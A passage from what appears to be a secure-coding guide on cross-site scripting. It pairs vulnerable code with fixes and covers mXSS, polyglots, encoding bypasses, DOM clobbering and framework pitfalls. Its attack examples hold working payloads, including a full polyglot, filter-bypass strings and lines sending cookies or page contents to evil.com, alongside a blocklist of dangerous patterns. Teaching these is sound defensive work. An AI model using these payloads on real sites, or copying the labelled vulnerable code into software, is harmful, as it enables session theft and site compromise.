function renderTemplate(message):
    return `<script>showNotification("${message}")</script>`

// Attack: message = '${alert(document.cookie)}'  // Template literal injection
// Attack: message = '");alert(document.cookie);//'  // String escape

// VULNERABLE: Dynamic script construction
function addEventHandler(eventName, userCallback):
    element.setAttribute("onclick", "handleEvent('" + userCallback + "')")

// Attack: userCallback = "'); stealData(); ('"

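Why this is dangerous:

JavaScript string contexts require JavaScript-specific escaping
An HTML closing tag (</script>) can break out of a script block
Template literals carry their own injection risk
Inline event handlers combine the HTML and JavaScript contexts

Bad Example 4: URL Context Injection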

// VULNERABLE: User input in href attribute
function renderNavLink(destination):
    return '<a href="' + destination + '">Click here</a>'

// Attack: destination = "javascript:alert(document.cookie)"
// Result: <a href="javascript:alert(document.cookie)">Click here</a>

// VULNERABLE: URL parameters without encoding
function buildSearchUrl(query):
    return '<a href="/search?q=' + query + '">Search again</a>'

// Attack: query = '" onclick="alert(1)" x="'
// Result: <a href="/search?q=" onclick="alert(1)" x="">Search again</a>

// VULNERABLE: Redirect based on user input
function handleRedirect(url):
    window.location = url

// Attack: url = "javascript:alert(document.cookie)"
// Result: JavaScript execution via location change

// VULNERABLE: Open redirect leading to XSS
function redirectAfterLogin(returnUrl):
    return '<meta http-equiv="refresh" content="0;url=' + returnUrl + '">'

// Attack: returnUrl = "data:text/html,<script>alert(1)</script>"
// Attack: returnUrl = "javascript:alert(1)"

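Why this is dangerous:

javascript: URLs execute code when navigated to
data: URLs can contain executable HTML/JavaScript
vbscript: URLs execute in legacy IE
URL encoding alone does not stop protocol-based attacks

Bad Example 5: CSS Context Injection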

// VULNERABLE: User input in CSS
function applyCustomStyle(customCss):
    styleElement = document.createElement("style")
    styleElement.textContent = ".user-style { " + customCss + " }"
    document.head.appendChild(styleElement)

// Attack: customCss = "} body { background: url('http://evil.com/log?data=' + document.cookie); } .x {"
// Result: CSS exfiltration of page data

// VULNERABLE: CSS expression (legacy IE)
function setWidth(width):
    element.style.cssText = "width: " + width

// Attack: width = "expression(alert(document.cookie))"
// Result: JavaScript execution via CSS expression (IE)

// VULNERABLE: CSS injection via style attribute
function renderAvatar(avatarUrl):
    return '<div style="background-image: url(' + avatarUrl + ')"></div>'

// Attack: avatarUrl = "x); } body { background: red; } .x { content: url(x"
// Modern Attack: avatarUrl = "https://evil.com/?' + btoa(document.body.innerHTML) + '"

// VULNERABLE: CSS @import injection
function loadTheme(themeUrl):
    return "<style>@import url('" + themeUrl + "');</style>"

// Attack: themeUrl = "'); } * { background: url('http://evil.com/steal?"

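Why this is dangerous:

CSS url() can leak data through outbound requests
expression() executes JavaScript in legacy IE
CSS injection can alter the page's appearance for phishing
@import can load attacker-controlled stylesheets

Good Examples for Each Context

Good Example 1: Proper HTML Encoding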

// SECURE: HTML entity encoding for body content
function htmlEncode(str):
    return str
        .replace("&", "&amp;")    // Must be first
        .replace("<", "&lt;")
        .replace(">", "&gt;")
        .replace('"', "&quot;")
        .replace("'", "&#x27;")
        .replace("/", "&#x2F;")   // Prevents </script> escapes

function displayUserComment(comment):
    safeComment = htmlEncode(comment)
    document.getElementById("comments").innerHTML =
        "<div class='comment'>" + safeComment + "</div>"

// SECURE: Using textContent instead of innerHTML
function displayUserCommentSafe(comment):
    div = document.createElement("div")
    div.className = "comment"
    div.textContent = comment  // Automatically safe - no HTML interpretation
    document.getElementById("comments").appendChild(div)

// SECURE: Server-side template with auto-escaping
function renderProfilePage(username, bio):
    // Use templating engine with auto-escaping enabled
    return template.render("profile.html", {
        username: username,  // Engine auto-escapes
        bio: bio
    })

// SECURE: Framework createElement pattern
function createUserCard(name, email):
    card = document.createElement("article")

    nameEl = document.createElement("h3")
    nameEl.textContent = name  // Safe

    emailEl = document.createElement("p")
    emailEl.textContent = email  // Safe

    card.appendChild(nameEl)
    card.appendChild(emailEl)
    return card

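Why this is secure:

HTML entities are displayed as text instead of being interpreted as markup
textContent never interprets HTML
createElement + textContent is inherently safe
Auto-escaping templates handle encoding automatically

Good Example 2: Proper Attribute Encoding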

// SECURE: Attribute encoding (superset of HTML encoding)
function attributeEncode(str):
    return str
        .replace("&", "&amp;")
        .replace("<", "&lt;")
        .replace(">", "&gt;")
        .replace('"', "&quot;")
        .replace("'", "&#x27;")
        .replace("`", "&#x60;")
        .replace("=", "&#x3D;")

// SECURE: Always quote attributes and encode values
function renderImage(imageUrl, altText):
    safeUrl = attributeEncode(imageUrl)
    safeAlt = attributeEncode(altText)
    return '<img src="' + safeUrl + '" alt="' + safeAlt + '">'

// SECURE: Using setAttribute (browser handles encoding)
function renderImageSafe(imageUrl, altText):
    img = document.createElement("img")
    img.setAttribute("src", imageUrl)   // Safe
    img.setAttribute("alt", altText)    // Safe
    return img

// SECURE: Data attributes with proper encoding
function renderDataElement(userId, userName):
    div = document.createElement("div")
    div.dataset.userId = userId      // Automatically safe
    div.dataset.userName = userName  // Automatically safe
    return div

// SECURE: Style attribute with validation
ALLOWED_COLORS = {"red", "blue", "green", "yellow", "#fff", "#000"}

function setBackgroundColor(color):
    if color in ALLOWED_COLORS:
        element.style.backgroundColor = color
    else:
        element.style.backgroundColor = "white"  // Safe default

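Why this is secure:

Quoting prevents attribute breakout
Encoding prevents escaping from the quotes
setAttribute handles encoding automatically
dataset properties are automatically safe
The allowlist prevents injection of arbitrary values

Good Example 3: JavaScript Encoding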

// SECURE: JavaScript string encoding
function jsStringEncode(str):
    return str
        .replace("\\", "\\\\")     // Backslash first
        .replace("'", "\\'")
        .replace('"', '\\"')
        .replace("\n", "\\n")
        .replace("\r", "\\r")
        .replace("</", "<\\/")     // Prevent script tag escape
        .replace("<!--", "\\x3C!--") // Prevent HTML comment

// SECURE: JSON encoding for embedding data
function generateUserScript(userData):
    jsonData = jsonEncode(userData)

    // Escape HTML-significant characters as \uXXXX so </script> cannot break out.
    // Do NOT HTML-encode here: entities are not decoded inside <script>,
    // so &quot; would reach the JavaScript parser as literal text.
    safeJson = jsonData
        .replace("<", "\\u003C")
        .replace(">", "\\u003E")
        .replace("&", "\\u0026")

    return """
        <script>
            var data = {safeJson};
            processData(data);
        </script>
    """.format(safeJson=safeJson)

// BETTER: Use data attributes instead of inline scripts
function embedUserDataSafe(element, userData):
    // Store data in attribute, process in external script
    element.dataset.user = jsonEncode(userData)
    // External script reads: JSON.parse(element.dataset.user)

// SECURE: Separate data from code with JSON endpoint
function loadUserData():
    // Instead of embedding in HTML, fetch from API
    fetch('/api/user/data')
        .then(response => response.json())
        .then(data => processData(data))

// SECURE: Using structured data in script type
function embedStructuredData(pageData):
    return """
        <script type="application/json" id="page-data">
            {jsonData}
        </script>
        <script>
            var data = JSON.parse(
                document.getElementById('page-data').textContent
            );
        </script>
    """.format(jsonData=jsonEncode(pageData).replace("<", "\\u003C"))  // Escape "<" so "</script>" cannot close the block

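Why this is secure:

JavaScript escaping prevents breaking out of strings
Escaping < inside script blocks prevents </script> breakout
Data attributes separate data from code
JSON endpoints avoid embedding untrusted data in HTML
type="application/json" blocks are not executed as JavaScript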
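On the server side, one way to make JSON safe for an inline script block is to replace the characters the HTML parser cares about with `\uXXXX` escapes, which remain valid JSON. The helper name `json_for_script` and the sample payload are assumptions for illustration. `json.dumps` keeps its default `ensure_ascii=True`, which also escapes U+2028 and U+2029.

```python
import json

def json_for_script(data) -> str:
    """Serialize data for inline <script> use, escaping characters
    that the HTML parser would otherwise act on."""
    text = json.dumps(data)
    return (
        text.replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026")
    )

payload = {"bio": "</script><script>alert(1)</script>"}
embedded = json_for_script(payload)
page = f'<script type="application/json" id="page-data">{embedded}</script>'
```

A JSON parser turns the escapes back into the original characters, so the consuming script sees the same data while the HTML parser never sees a closing tag inside the block.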

Good Example 4: URL Encoding

// SECURE: URL encoding for query parameters
function urlEncode(str):
    return encodeURIComponent(str)

function buildSearchUrl(query):
    safeQuery = urlEncode(query)
    return '/search?q=' + safeQuery

// SECURE: Validating URL schemes (allowlist)
SAFE_SCHEMES = {"http", "https", "mailto"}

function validateUrl(url):
    try:
        parsed = parseUrl(url)
        if parsed.scheme.lower() in SAFE_SCHEMES:
            return url
    catch:
        pass
    return "/fallback"  // Safe default

function renderLink(destination, text):
    safeUrl = validateUrl(destination)
    safeText = htmlEncode(text)
    return '<a href="' + attributeEncode(safeUrl) + '">' + safeText + '</a>'

// SECURE: URL validation with additional checks
function validateExternalUrl(url):
    parsed = parseUrl(url)

    // Check scheme
    if parsed.scheme.lower() not in {"http", "https"}:
        return null

    // Check for credential injection
    if parsed.username or parsed.password:
        return null

    // Check for IP address (optional restriction)
    if isIpAddress(parsed.host):
        return null

    return url

// SECURE: Relative URLs only (prevent open redirect)
function validateRedirectUrl(url):
    // Only allow relative paths; "//host" and "/\host" are treated as absolute by browsers
    if url.startsWith("/") and not url.startsWith("//") and not url.startsWith("/\\"):
        // Prevent path traversal
        normalized = normalizePath(url)
        if ".." not in normalized:
            return normalized
    return "/"  // Safe default

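Why this is secure:

encodeURIComponent handles special characters
The scheme allowlist blocks javascript: and data: URLs
Relative-path-only validation prevents open redirects
Multiple validation layers provide defense in depth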
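A server-side counterpart of the scheme allowlist and the relative-redirect check can be sketched with `urllib.parse`. The function names and the `/fallback` default mirror the pseudocode above. Rejecting `/\` as well as `//` is an added assumption, based on browsers treating a backslash like a forward slash.

```python
from urllib.parse import urlsplit

SAFE_SCHEMES = {"http", "https", "mailto"}

def validate_url(url: str, fallback: str = "/fallback") -> str:
    cleaned = url.strip()
    try:
        scheme = urlsplit(cleaned).scheme.lower()
    except ValueError:  # raised for some malformed URLs
        return fallback
    # Relative URLs have an empty scheme and also fall back here,
    # matching the pseudocode's behavior.
    return cleaned if scheme in SAFE_SCHEMES else fallback

def validate_redirect(url: str) -> str:
    # Relative paths only; "//host" and "/\host" are treated as absolute
    # by browsers, and ".." is rejected to avoid path traversal.
    if url.startswith("/") and not url.startswith(("//", "/\\")) and ".." not in url:
        return url
    return "/"
```

The result of `validate_url` still needs attribute encoding before it is written into an href, as in the renderLink pseudocode.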

Good Example 5: Using Safe APIs (textContent vs. innerHTML)

// SECURE: Safe DOM manipulation patterns

// Instead of innerHTML with user data:
// DANGEROUS: element.innerHTML = "<p>" + userInput + "</p>"

// SECURE: Use textContent for text nodes
function setElementText(element, text):
    element.textContent = text  // Never interprets HTML

// SECURE: Build DOM programmatically
function createListItem(text, isHighlighted):
    li = document.createElement("li")
    li.textContent = text  // Safe text assignment

    if isHighlighted:
        li.classList.add("highlighted")  // Safe class manipulation

    return li

// SECURE: Use template elements for complex HTML
function createCardFromTemplate(name, description):
    template = document.getElementById("card-template")
    card = template.content.cloneNode(true)

    // Set text content safely
    card.querySelector(".card-name").textContent = name
    card.querySelector(".card-desc").textContent = description

    return card

// SECURE: Use DocumentFragment for batch operations
function renderList(items):
    fragment = document.createDocumentFragment()

    for item in items:
        li = document.createElement("li")
        li.textContent = item.name  // Safe
        fragment.appendChild(li)

    document.getElementById("list").appendChild(fragment)

// SECURE: Sanitize when HTML is genuinely needed
function renderRichContent(htmlContent):
    // Use DOMPurify or similar trusted sanitizer
    sanitized = DOMPurify.sanitize(htmlContent, {
        ALLOWED_TAGS: ["b", "i", "em", "strong", "a", "p", "br"],
        ALLOWED_ATTR: ["href"],
        ALLOW_DATA_ATTR: false
    })
    element.innerHTML = sanitized

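Why this is secure:

textContent never parses HTML or scripts
createElement + textContent is inherently safe
Templates allow complex HTML without injection risk
DOMPurify provides sanitization when HTML is genuinely needed

Edge Cases

Edge Case 1: Mutation XSS (mXSS)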

// DANGEROUS: Browser mutations can bypass sanitization

// How mXSS works:
// 1. Sanitizer processes malformed HTML
// 2. Browser "fixes" the HTML during parsing
// 3. Fixed HTML contains executable content

// Example: Backtick mutation
inputHtml = "<img src=x onerror=`alert(1)`>"
// Some sanitizers don't escape backticks
// Browser may convert backticks to quotes in certain contexts

// Example: Namespace confusion
inputHtml = "<math><annotation-xml><foreignObject><script>alert(1)</script>"
// SVG/MathML namespaces have different parsing rules
// Sanitizer might miss the nested script

// Example: Table element mutations
inputHtml = "<table><form><input name='x'></form></table>"
// Browser moves <form> outside <table> during parsing
// Can result in unexpected DOM structure

// SECURE: Use battle-tested sanitizer with mXSS protection
function sanitizeHtml(html):
    return DOMPurify.sanitize(html, {
        // DOMPurify has mXSS protection built-in
        USE_PROFILES: {html: true},
        // Optionally restrict further
        FORBID_TAGS: ["style", "math", "svg"],
        FORBID_ATTR: ["style"]
    })

// BETTER: Avoid HTML sanitization when possible
function renderUserContent(content):
    // If you only need formatted text, use markdown
    markdownHtml = markdownToHtml(content)  // Controlled conversion
    return DOMPurify.sanitize(markdownHtml)

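Detection: Test with:

Malformed nesting (<a><table><a>)
Namespaced elements (<svg>, <math>, <foreignObject>)
Backticks and other unusual quote characters
Processing-instruction-like content (<?xml>)

Edge Case 2: Polyglot Payloads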

// DANGEROUS: Payloads that work in multiple contexts

// Polyglot XSS example:
payload = "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcLiCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>"

// This payload attempts to work in:
// - JavaScript context (javascript: URL)
// - HTML attribute context (onclick)
// - Inside HTML comments
// - Inside style/title/textarea/script tags
// - SVG context

// Why this matters:
// - Single payload tests multiple vectors
// - Fuzzy input handling might trigger in unexpected context
// - Copy-paste from "safe" context to unsafe context

// SECURE: Context-specific encoding, not generic filtering
function outputToContext(value, context):
    switch context:
        case "html_body":
            return htmlEncode(value)
        case "html_attribute":
            return attributeEncode(value)
        case "javascript_string":
            return jsStringEncode(value)
        case "url_parameter":
            return urlEncode(value)
        case "css_value":
            return cssEncode(value)
        default:
            throw Error("Unknown context: " + context)

// Each encoder handles that specific context's dangerous characters

Detection: Use polyglot payloads in security testing to uncover context-confusion vulnerabilities.

Edge Case 3: Encoding Bypass Techniques

// DANGEROUS: Incomplete encoding can be bypassed

// Bypass 1: Case variation
// Filter checks: if "<script" in input: reject
// Bypass: "<ScRiPt>alert(1)</sCrIpT>"
// Browser: case-insensitive HTML parsing

// Bypass 2: HTML entities in event handlers
// Filter: remove "javascript:"
// Input: "&#106;avascript:alert(1)"
// Browser decodes entities before processing

// Bypass 3: Null bytes
// Input: "java\x00script:alert(1)"
// Some filters/WAFs don't handle null bytes
// Some browsers ignore them

// Bypass 4: Overlong UTF-8
// Normal '<': 0x3C
// Overlong: 0xC0 0xBC (invalid UTF-8, but some parsers accept)

// Bypass 5: Mixed encoding
// Input: "%3Cscript%3Ealert(1)%3C/script%3E"
// If HTML-encoded before URL-decoded, double encoding attack

// SECURE: Encode on output, not filter on input
function secureOutput(userInput, context):
    // Don't try to filter/blocklist dangerous patterns
    // DO encode appropriately for the output context

    // The encoding makes ALL user input safe
    // regardless of what it contains
    return encode(userInput, context)

// SECURE: Canonicalize THEN validate
function processInput(input):
    // 1. Decode all encoding layers
    decoded = fullyDecode(input)  // URL, HTML entities, etc.

    // 2. Normalize (lowercase, normalize unicode)
    normalized = normalize(decoded)

    // 3. Validate against rules
    if not isValid(normalized):
        reject()

    // 4. Store normalized form
    store(normalized)

    // 5. Encode on output (later)

Key insight: Output encoding is more reliable than input filtering because you know the exact output context.

Edge Case 4: DOM Clobbering

// DANGEROUS: HTML elements can override JavaScript globals

// How DOM clobbering works:
// Elements with id or name attributes become named properties of window/document
html = '<img id="appConfig">'
// Now: window.appConfig === <img> element, if the page never defined appConfig
// Built-in window members such as alert are NOT overridden this way

// Exploitable clobbering:
html = '<img name="cookie">'
// document.cookie may now return the <img> element instead of the cookie string

// Attack on sanitizer output:
html = '<a id="cid" name="cid" href="javascript:alert(1)">'
// If code does: location = window.cid  (expecting a string)
// the anchor stringifies to its href, so the attacker controls the navigation

// More dangerous patterns:
html = '<form id="x"><input id="y"></form>'
// x.y now references the input
// Chains allow deep property access

// SECURE: Avoid global lookups for security-sensitive operations
function getConfigValue(key):
    // DON'T: return window[key]
    // DON'T: return document.getElementById(key).value

    // DO: Use a namespaced config object
    return APP_CONFIG[key]

// SECURE: Use unique prefixes for security-critical IDs
function getElementById(id):
    // Prefix with app-specific namespace
    return document.getElementById("app__" + id)

// SECURE: Validate types after DOM queries
function getFormElement(id):
    element = document.getElementById(id)
    if element instanceof HTMLFormElement:
        return element
    throw Error("Expected form element")

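Detection: Test with:

Elements whose id matches JavaScript global names (alert, name, location)
Elements whose name matches object properties (cookie, domain)
Nested forms with chained name/id attributes

Common Mistakes

Mistake 1: Encoding Once for Multiple Contexts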

// DANGEROUS: Single encoding for multiple contexts

function saveUserProfile(name, bio):
    // Encoding once at input time
    safeName = htmlEncode(name)
    safeBio = htmlEncode(bio)

    database.save({name: safeName, bio: safeBio})

function displayProfile(user):
    // HTML context - HTML encoding was correct
    htmlOutput = "<h1>" + user.name + "</h1>"  // OK

    // But JavaScript context needs different encoding!
    jsOutput = "<script>var name = '" + user.name + "';</script>"
    // If name contained single quotes: "O'Brien" -> already encoded as "O&#x27;Brien"
    // Now in JS context, &#x27; is literal text, not a quote escape

    // And URL context is wrong too!
    urlOutput = "/profile?name=" + user.name
    // HTML entities in URL don't encode properly

// SECURE: Store raw data, encode on output
function saveUserProfile(name, bio):
    // Store raw (unencoded) user input
    database.save({name: name, bio: bio})

function displayProfile(user):
    // Encode specifically for each output context
    htmlName = htmlEncode(user.name)
    jsName = jsStringEncode(user.name)
    urlName = urlEncode(user.name)

    htmlOutput = "<h1>" + htmlName + "</h1>"
    jsOutput = "<script>var name = '" + jsName + "';</script>"
    urlOutput = "/profile?name=" + urlName

Rule: Store raw data. Encode at output time, using the encoder that matches each context.
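As a rough illustration of the rule, the sketch below encodes one raw value three different ways using only the Python standard library. The function names (`encode_for_html`, `encode_for_js_string`, `encode_for_url_param`) are hypothetical and stand in for the `htmlEncode`, `jsStringEncode`, and `urlEncode` helpers in the pseudocode; a real project would normally rely on its template engine or framework for this.

```python
import html
import json
from urllib.parse import quote


def encode_for_html(value: str) -> str:
    """Encode for an HTML element body or a quoted attribute value."""
    return html.escape(value, quote=True)


def encode_for_js_string(value: str) -> str:
    """Return a quoted JavaScript string literal that is safe inside <script>."""
    # json.dumps yields a valid JS string literal; escaping <, >, and & as well
    # stops a value such as "</script>" from closing the script element.
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def encode_for_url_param(value: str) -> str:
    """Percent-encode a value for use as a query-string parameter."""
    return quote(value, safe="")


# The same raw (stored) value, encoded separately for each output context.
raw_name = "O'Brien </script>"
html_output = "<h1>" + encode_for_html(raw_name) + "</h1>"
js_output = "<script>var name = " + encode_for_js_string(raw_name) + ";</script>"
url_output = "/profile?name=" + encode_for_url_param(raw_name)
```

Note that the JavaScript encoder returns the surrounding quotes itself, so the template does not add its own.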

Mistake 2: Client-Side-Only Sanitization

// DANGEROUS: Relying only on client-side protection

// Client-side sanitization
function submitComment(comment):
    // Sanitize before sending to server
    cleanComment = DOMPurify.sanitize(comment)
    fetch("/api/comments", {
        method: "POST",
        body: JSON.stringify({comment: cleanComment})
    })

// Problem: Attacker bypasses client-side code entirely
// Using curl, Postman, or modified browser
curlCommand = """
curl -X POST https://site.com/api/comments \\
     -H "Content-Type: application/json" \\
     -d '{"comment": "<script>alert(1)</script>"}'
"""

// Server trusts the input because "client sanitized it"
function handleCommentApi(request):
    comment = request.body.comment
    database.saveComment(comment)  // Stored XSS!

// SECURE: Server-side sanitization is mandatory
function handleCommentApiSecure(request):
    comment = request.body.comment

    // Server-side sanitization
    cleanComment = serverSideSanitize(comment)

    database.saveComment(cleanComment)

function displayComment(comment):
    // Still encode on output (defense in depth)
    return htmlEncode(comment)

// NOTE: Client-side sanitization can still be useful for:
// - Preview functionality
// - Reducing server load
// - Better UX feedback
// But it must NEVER be the only protection

Rule: Server-side encoding/sanitization is mandatory. Client-side sanitization is an optional enhancement.

Mistake 3: Blocklist Approach

// DANGEROUS: Trying to block known-bad patterns

function filterXss(input):
    // Block list approach
    dangerous = [
        "<script", "</script>",
        "javascript:",
        "onerror", "onload", "onclick",
        "alert", "eval", "document.cookie"
    ]

    result = input
    for pattern in dangerous:
        result = result.replace(pattern, "")

    return result

// Bypasses:
// 1. Case: "<SCRIPT>alert(1)</SCRIPT>"
// 2. Encoding: "&#60;script&#62;alert(1)&#60;/script&#62;"
// 3. Null bytes: "<scr\x00ipt>alert(1)</scr\x00ipt>"
// 4. Other events: "onmouseover", "onfocus", "onanimationend"
// 5. Other sinks: "fetch('http://evil.com/'+document.cookie)"
// 6. New features: Future HTML/JS features not in blocklist

// DANGEROUS: Regex blocklist
function filterXssRegex(input):
    // Still bypassable: a single pass that strips script tags
    return regex.replace(/<\/?script>/gi, "", input)

// Bypass: "<scr<script>ipt>alert(1)</scr</script>ipt>"
// After removal: "<script>alert(1)</script>"

// SECURE: Allowlist approach
function sanitizeUsername(input):
    // Only allow expected characters
    if regex.match(/^[a-zA-Z0-9_-]{1,30}$/, input):
        return input
    throw ValidationError("Invalid username")

// SECURE: Proper encoding (makes blocklist unnecessary)
function displaySafely(input):
    return htmlEncode(input)  // Safe for HTML body context once encoded

Rule: Allowlist the content you expect, or encode everything. Never rely on a blocklist of dangerous patterns.
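The difference between the two approaches can be reproduced in a few lines. The sketch below is illustrative only: `naive_blocklist_filter` mimics a single-pass tag-stripping filter, and `validate_username` is a hypothetical allowlist validator for one specific field.

```python
import re

BLOCKED_TAGS = re.compile(r"</?script>", re.IGNORECASE)
USERNAME_PATTERN = re.compile(r"[A-Za-z0-9_-]{1,30}")


def naive_blocklist_filter(value: str) -> str:
    """Single-pass removal of script tags (the flawed approach)."""
    return BLOCKED_TAGS.sub("", value)


def validate_username(value: str) -> str:
    """Allowlist: accept only the characters a username is expected to have."""
    # fullmatch is used instead of ^...$ because "$" also matches just
    # before a trailing newline in Python.
    if USERNAME_PATTERN.fullmatch(value):
        return value
    raise ValueError("Invalid username")


# Removing the inner tags lets the outer fragments rejoin into a script tag.
payload = "<scr<script>ipt>alert(1)</scr</script>ipt>"
filtered = naive_blocklist_filter(payload)
```

The allowlist never has to anticipate attack strings; anything outside the expected character set is rejected outright.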

Mistake 4: Blindly Trusting Sanitization Libraries

// DANGEROUS: Assuming sanitization handles everything

function processHtml(userHtml):
    // "The library handles XSS"
    clean = sanitizer.sanitize(userHtml)

    // But then using it unsafely:
    // 1. Wrong context
    return "<script>var content = '" + clean + "';</script>"
    // Sanitizer cleaned HTML context, not JavaScript context

    // 2. Double encoding
    clean = sanitizer.sanitize(htmlEncode(userHtml))
    // Now clean contains encoded entities that might decode later

    // 3. Post-processing that reintroduces vulnerabilities
    processed = clean.replace("[link]", "<a href='").replace("[/link]", "'>link</a>")
    // Custom processing after sanitization can break safety

// SECURE: Understand what the sanitizer does
function processHtmlSecure(userHtml):
    // 1. Sanitize for HTML context
    cleanHtml = DOMPurify.sanitize(userHtml, {
        ALLOWED_TAGS: ["p", "b", "i", "a"],
        ALLOWED_ATTR: ["href"]
    })

    // 2. Validate URLs in allowed href attributes
    dom = parseHtml(cleanHtml)
    for link in dom.querySelectorAll("a[href]"):
        if not isValidUrl(link.href):
            link.removeAttribute("href")

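    // 3. Serialize the modified DOM (not the earlier string) and use it only in HTML context
    return serializeHtml(dom)  // hypothetical helper that turns the DOM back into markup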

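// SECURE: For JavaScript context, don't use HTML sanitizer
function embedDataInJs(data):
    // JSON encoding is the appropriate "sanitizer" for JSON/JS
    // When the result is placed inside a <script> block, also escape "<"
    // so a value containing "</script>" cannot close the element
    return JSON.stringify(data).replace(/</g, "\\u003c")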

Rule: Use the encoding or sanitization method that matches each context. Sanitization is context-specific.
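The secure example above calls an `isValidUrl` helper without defining it. One possible shape for such a check, assuming that only absolute http and https links should survive, is sketched below with Python's standard `urllib.parse`; the name `is_valid_url` and the exact policy are assumptions, not something the source prescribes.

```python
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_valid_url(url: str) -> bool:
    """Return True only for absolute http(s) URLs that include a host."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        # urlsplit raises ValueError for some malformed inputs.
        return False
    # urlsplit lowercases the scheme, so "JaVaScRiPt:" is rejected as well.
    return parts.scheme in ALLOWED_SCHEMES and bool(parts.netloc)
```

Relative links are rejected under this policy; an application that needs them would have to extend the check deliberately rather than loosen the scheme test.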

Framework-Specific Guidance (Pseudocode Patterns)

React Patterns

// React default: Auto-escaping in JSX
function UserProfile(props):
    // SAFE: React escapes by default
    return (
        <div>
            <h1>{props.username}</h1>    // Auto-escaped
            <p>{props.bio}</p>            // Auto-escaped
        </div>
    )

// DANGEROUS: dangerouslySetInnerHTML bypasses protection
function RichContent(props):
    // VULNERABLE if props.html is user-controlled
    return <div dangerouslySetInnerHTML={{__html: props.html}} />

// SECURE: Sanitize before using dangerouslySetInnerHTML
function RichContentSafe(props):
    sanitizedHtml = DOMPurify.sanitize(props.html)
    return <div dangerouslySetInnerHTML={{__html: sanitizedHtml}} />

// DANGEROUS: href with user input
function UserLink(props):
    // VULNERABLE: javascript: URLs execute
    return <a href={props.url}>{props.text}</a>

// SECURE: Validate URL scheme
function UserLinkSafe(props):
    url = props.url
    if not url.startsWith("http://") and not url.startsWith("https://"):
        url = "#"  // Safe fallback
    return <a href={url}>{props.text}</a>

Vue Patterns

// Vue default: Auto-escaping with {{ }}
<template>
    <!-- SAFE: Vue escapes interpolation -->
    <h1>{{ username }}</h1>
    <p>{{ bio }}</p>
</template>

// DANGEROUS: v-html bypasses protection
<template>
    <!-- VULNERABLE: v-html renders raw HTML -->
    <div v-html="userContent"></div>
</template>

// SECURE: Sanitize before v-html
<script>
export default {
    computed: {
        safeContent() {
            return DOMPurify.sanitize(this.userContent)
        }
    }
}
</script>
<template>
    <div v-html="safeContent"></div>
</template>

// DANGEROUS: Dynamic attribute binding
<template>
    <!-- VULNERABLE: javascript: in href -->
    <a :href="userUrl">Link</a>
</template>

// SECURE: URL validation
<script>
export default {
    computed: {
        safeUrl() {
            return this.isValidHttpUrl(this.userUrl) ? this.userUrl : '#'
        }
    }
}
</script>

Angular Patterns

// Angular default: Auto-sanitization
@Component({
    template: `
        <!-- SAFE: Angular sanitizes -->
        <h1>{{ username }}</h1>
        <p>{{ bio }}</p>
    `
})

// Angular [innerHTML] is semi-safe (Angular sanitizes)
@Component({
    template: `
        <!-- Angular sanitizes, but still risky -->
        <div [innerHTML]="userContent"></div>
    `
})

// DANGEROUS: Bypassing sanitization
import { DomSanitizer } from '@angular/platform-browser'

@Component({...})
class MyComponent {
    constructor(private sanitizer: DomSanitizer) {}

    // VULNERABLE: Bypasses Angular's sanitization
    get unsafeHtml() {
        return this.sanitizer.bypassSecurityTrustHtml(this.userInput)
    }
}

// SECURE: Let Angular sanitize, or use additional sanitizer
@Component({...})
class MyComponentSafe {
    get safeHtml() {
        // Angular's default sanitization is usually sufficient
        // For extra safety, pre-sanitize
        return DOMPurify.sanitize(this.userInput)
    }
}

Server-Side Template Engine Patterns

// Jinja2 (Python)
// SAFE: Auto-escaping by default
<h1>{{ username }}</h1>

// DANGEROUS: |safe filter
<div>{{ user_html | safe }}</div>  <!-- VULNERABLE -->

// Handlebars
// SAFE: {{ }} escapes
<h1>{{username}}</h1>

// DANGEROUS: {{{ }}} triple braces
<div>{{{user_html}}}</div>  <!-- VULNERABLE -->

// EJS (Node.js)
// SAFE: <%= %> escapes
<h1><%= username %></h1>

// DANGEROUS: <%- %> raw
<div><%- user_html %></div>  <!-- VULNERABLE -->

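// SECURE PATTERN: Prefer escaping syntax; when HTML is required, sanitize first
// and emit the sanitized result through the engine's raw-output path
// Jinja2
<div>{{ user_html | sanitize }}</div>  <!-- Custom filter wrapping a server-side sanitizer; returns Markup -->

// Handlebars
<div>{{sanitize user_html}}</div>  <!-- Custom helper returning a SafeString -->

// EJS
<div><%- sanitize(user_html) %></div>  <!-- Raw output of already-sanitized HTML -->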

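Security Checklist

All user input rendered as HTML is HTML-encoded.
All user input in HTML attributes is attribute-encoded and quoted.
All user input in JavaScript strings is JavaScript-encoded.
All user input in URLs is URL-encoded (with scheme validation for links).
All user input in CSS is CSS-encoded or validated against an allowlist.
innerHTML, document.write, and similar sinks are avoided or used only with sanitized input.
textContent is used instead of innerHTML wherever possible.
dangerouslySetInnerHTML, v-html, |safe, and similar are used only with sanitized content.
URL schemes are validated (only http/https allowed; javascript: rejected).
Server-side encoding/sanitization is implemented (not just client-side).
Encoding is performed at output time and is context-specific.
An HTML sanitizer (DOMPurify) is used when rich HTML input is required.
Content Security Policy (CSP) headers are implemented.
X-XSS-Protection and X-Content-Type-Options headers are set.
The HttpOnly flag is set on cookies to block JavaScript access.
No user input reaches eval(), new Function(), or setTimeout with a string argument.
Framework auto-escaping is enabled and not bypassed.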

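Pattern 4: Authentication and Session Security

CWE References: CWE-287 (Improper Authentication), CWE-384 (Session Fixation), CWE-613 (Insufficient Session Expiration), CWE-307 (Improper Restriction of Excessive Authentication Attempts), CWE-308 (Use of Single-factor Authentication), CWE-640 (Weak Password Recovery Mechanism for Forgotten Password), CWE-1275 (Sensitive Cookie with Improper SameSite Attribute)

Priority Score: 22 (Frequency: 8, Severity: 9, Detectability: 5)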

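Introduction: High Complexity Leads to High AI Error Rates

Authentication and session management are among the most complex security areas in application development. AI models struggle with these patterns in particular, for several interrelated reasons:

Why AI models generate insecure authentication code:

Complexity breeds shortcuts: Authentication requires coordinating multiple components: password storage, session management, token generation, cookie handling, and logout flows. To keep things simple, AI models often generate code that "works" but omits necessary security layers.
Tutorial syndrome: Training data is full of simplified authentication tutorials written to teach concepts, not to build production systems. These tutorials routinely skip rate limiting, secure token generation, proper session invalidation, and timing-attack defenses.
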